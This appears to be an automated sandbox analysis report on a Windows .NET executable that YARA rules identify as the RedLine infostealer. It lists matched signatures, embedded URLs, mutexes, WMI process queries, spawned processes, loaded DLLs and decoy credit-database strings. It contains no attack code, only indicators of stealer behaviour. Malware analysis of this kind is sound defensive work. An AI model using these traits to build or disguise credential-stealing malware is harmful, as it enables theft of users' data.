Source: tmp6AA2.tmp.3.dr, tmpA4A1.tmp.3.dr, tmpDE63.tmp.3.dr, tmpDE62.tmp.3.dr, tmp6A70.tmp.3.dr, tmp6A92.tmp.3.dr, tmpA480.tmp.3.dr, tmpA4B2.tmp.3.dr, tmpDE52.tmp.3.dr, tmpA4C2.tmp.3.dr, tmp6A81.tmp.3.dr, tmpA481.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp6AA2.tmp.3.dr, tmpA4A1.tmp.3.dr, tmpDE63.tmp.3.dr, tmpDE62.tmp.3.dr, tmp6A70.tmp.3.dr, tmp6A92.tmp.3.dr, tmpA480.tmp.3.dr, tmpA4B2.tmp.3.dr, tmpDE52.tmp.3.dr, tmpA4C2.tmp.3.dr, tmp6A81.tmp.3.dr, tmpA481.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp6AA2.tmp.3.dr, tmpA4A1.tmp.3.dr, tmpDE63.tmp.3.dr, tmpDE62.tmp.3.dr, tmp6A70.tmp.3.dr, tmp6A92.tmp.3.dr, tmpA480.tmp.3.dr, tmpA4B2.tmp.3.dr, tmpDE52.tmp.3.dr, tmpA4C2.tmp.3.dr, tmp6A81.tmp.3.dr, tmpA481.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 8ZVd2S51fr.exe, 8ZVd2S51fr.exe, 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmp6AA2.tmp.3.dr, tmpA4A1.tmp.3.dr, tmpDE63.tmp.3.dr, tmpDE62.tmp.3.dr, tmp6A70.tmp.3.dr, tmp6A92.tmp.3.dr, tmpA480.tmp.3.dr, tmpA4B2.tmp.3.dr, tmpDE52.tmp.3.dr, tmpA4C2.tmp.3.dr, tmp6A81.tmp.3.dr, tmpA481.tmp.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp6AA2.tmp.3.dr, tmpA4A1.tmp.3.dr, tmpDE63.tmp.3.dr, tmpDE62.tmp.3.dr, tmp6A70.tmp.3.dr, tmp6A92.tmp.3.dr, tmpA480.tmp.3.dr, tmpA4B2.tmp.3.dr, tmpDE52.tmp.3.dr, tmpA4C2.tmp.3.dr, tmp6A81.tmp.3.dr, tmpA481.tmp.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.8ZVd2S51fr.exe.384ac20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.8ZVd2S51fr.exe.384ac20.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.8ZVd2S51fr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 3.2.8ZVd2S51fr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 8ZVd2S51fr.exe PID: 5452, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 8ZVd2S51fr.exe PID: 5260, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 0_2_009DD51C	0_2_009DD51C
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 0_2_06D1AEF8	0_2_06D1AEF8
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 0_2_06D11E00	0_2_06D11E00
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 0_2_06D172B8	0_2_06D172B8
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 0_2_06D15230	0_2_06D15230
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 0_2_06D16908	0_2_06D16908
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 3_2_015DE7B0	3_2_015DE7B0
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 3_2_015DDC90	3_2_015DDC90
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 3_2_068C9628	3_2_068C9628
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 3_2_068C4468	3_2_068C4468
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 3_2_068C1210	3_2_068C1210
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 3_2_068C3320	3_2_068C3320
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 3_2_068CD108	3_2_068CD108
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 3_2_068CDD00	3_2_068CDD00
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 3_2_068CEB28	3_2_068CEB28

Source: 8ZVd2S51fr.exe, 00000000.00000002.2090231479.000000000387A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe, 00000000.00000002.2090231479.000000000387A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe, 00000000.00000002.2089142838.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe, 00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe, 00000000.00000002.2089685201.000000000278F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamenWPD.exe4 vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe, 00000000.00000002.2091428757.0000000007220000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe, 00000000.00000002.2091180069.0000000006840000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe, 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe, 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 8ZVd2S51fr.exe
Source: 8ZVd2S51fr.exe	Binary or memory string: OriginalFilenamenWPD.exe4 vs 8ZVd2S51fr.exe

Source: 8ZVd2S51fr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.8ZVd2S51fr.exe.384ac20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.8ZVd2S51fr.exe.384ac20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.8ZVd2S51fr.exe.384ac20.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.8ZVd2S51fr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 3.2.8ZVd2S51fr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 8ZVd2S51fr.exe PID: 5452, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 8ZVd2S51fr.exe PID: 5260, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	Security API names: _0020.SetAccessControl
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	Security API names: _0020.AddAccessRule
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, oYK3x0Ru2C5rWqElu3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, oYK3x0Ru2C5rWqElu3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	Security API names: _0020.SetAccessControl
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/45@1/1

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8ZVd2S51fr.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_03
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Mutant created: \Sessions\1\BaseNamedObjects\kChtRVECeVqV

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

File created: C:\Users\user\AppData\Local\Temp\tmp2FF2.tmp

Jump to behavior

Source: 8ZVd2S51fr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 8ZVd2S51fr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: tmpDEA4.tmp.3.dr, tmpDEA6.tmp.3.dr, tmp3002.tmp.3.dr, tmp1799.tmp.3.dr, tmp179A.tmp.3.dr, tmpDEA5.tmp.3.dr, tmp2FF2.tmp.3.dr, tmp6A5F.tmp.3.dr, tmp6A4E.tmp.3.dr, tmp6A60.tmp.3.dr, tmpDE93.tmp.3.dr, tmp3013.tmp.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 8ZVd2S51fr.exe, 00000000.00000000.2036617867.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);

Source: 8ZVd2S51fr.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\8ZVd2S51fr.exe "C:\Users\user\Desktop\8ZVd2S51fr.exe"
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process created: C:\Users\user\Desktop\8ZVd2S51fr.exe "C:\Users\user\Desktop\8ZVd2S51fr.exe"
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process created: C:\Users\user\Desktop\8ZVd2S51fr.exe "C:\Users\user\Desktop\8ZVd2S51fr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: msasn1.dll	Jump to behavior
